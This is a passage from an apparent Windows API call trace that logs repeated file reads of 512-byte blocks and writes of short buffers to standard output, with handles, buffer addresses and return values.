lpOverlapped=0x0) returned 1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] GetFileType (hFile=0x4c) returned 0x1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] GetFileType (hFile=0x4c) returned 0x1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.744] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.744] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.744] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] GetFileType (hFile=0x4c) returned 0x1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] GetFileType (hFile=0x4c) returned 0x1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] GetFileType (hFile=0x4c) returned 0x1 [0092.744] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.744] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] GetFileType (hFile=0x4c) returned 0x1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] GetFileType (hFile=0x4c) returned 0x1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] GetFileType (hFile=0x4c) returned 0x1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] GetFileType (hFile=0x4c) returned 0x1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] GetFileType (hFile=0x4c) returned 0x1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.745] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.745] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.745] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] GetFileType (hFile=0x4c) returned 0x1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] GetFileType (hFile=0x4c) returned 0x1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] GetFileType (hFile=0x4c) returned 0x1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.745] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.745] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] GetFileType (hFile=0x4c) returned 0x1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] GetFileType (hFile=0x4c) returned 0x1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] GetFileType (hFile=0x4c) returned 0x1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] GetFileType (hFile=0x4c) returned 0x1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] GetFileType (hFile=0x4c) returned 0x1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.746] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.746] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.746] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] GetFileType (hFile=0x4c) returned 0x1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] GetFileType (hFile=0x4c) returned 0x1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] GetFileType (hFile=0x4c) returned 0x1 [0092.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.746] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] GetFileType (hFile=0x4c) returned 0x1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] GetFileType (hFile=0x4c) returned 0x1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] GetFileType (hFile=0x4c) returned 0x1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] GetFileType (hFile=0x4c) returned 0x1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] GetFileType (hFile=0x4c) returned 0x1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.747] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] GetFileType (hFile=0x4c) returned 0x1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] GetFileType (hFile=0x4c) returned 0x1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] GetFileType (hFile=0x4c) returned 0x1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.747] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] GetFileType (hFile=0x4c) returned 0x1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] GetFileType (hFile=0x4c) returned 0x1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] GetFileType (hFile=0x4c) returned 0x1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] GetFileType (hFile=0x4c) returned 0x1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] GetFileType (hFile=0x4c) returned 0x1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.748] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.748] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.748] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.748] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] GetFileType (hFile=0x4c) returned 0x1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] GetFileType (hFile=0x4c) returned 0x1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] GetFileType (hFile=0x4c) returned 0x1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.748] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] GetFileType (hFile=0x4c) returned 0x1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] GetFileType (hFile=0x4c) returned 0x1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] GetFileType (hFile=0x4c) returned 0x1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] GetFileType (hFile=0x4c) returned 0x1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] GetFileType (hFile=0x4c) returned 0x1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.749] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.749] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.749] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.749] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] GetFileType (hFile=0x4c) returned 0x1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] GetFileType (hFile=0x4c) returned 0x1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] GetFileType (hFile=0x4c) returned 0x1 [0092.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.749] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] GetFileType (hFile=0x4c) returned 0x1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] GetFileType (hFile=0x4c) returned 0x1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] GetFileType (hFile=0x4c) returned 0x1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] GetFileType (hFile=0x4c) returned 0x1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] GetFileType (hFile=0x4c) returned 0x1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.750] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.750] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.750] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.750] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] GetFileType (hFile=0x4c) returned 0x1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] GetFileType (hFile=0x4c) returned 0x1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.750] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] GetFileType (hFile=0x4c) returned 0x1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] GetFileType (hFile=0x4c) returned 0x1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] GetFileType (hFile=0x4c) returned 0x1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] GetFileType (hFile=0x4c) returned 0x1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] GetFileType (hFile=0x4c) returned 0x1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] GetFileType (hFile=0x4c) returned 0x1 [0092.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.751] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.752] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.752] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.752] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.752] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.752] _get_osfhandle (_FileHandle=1) returned 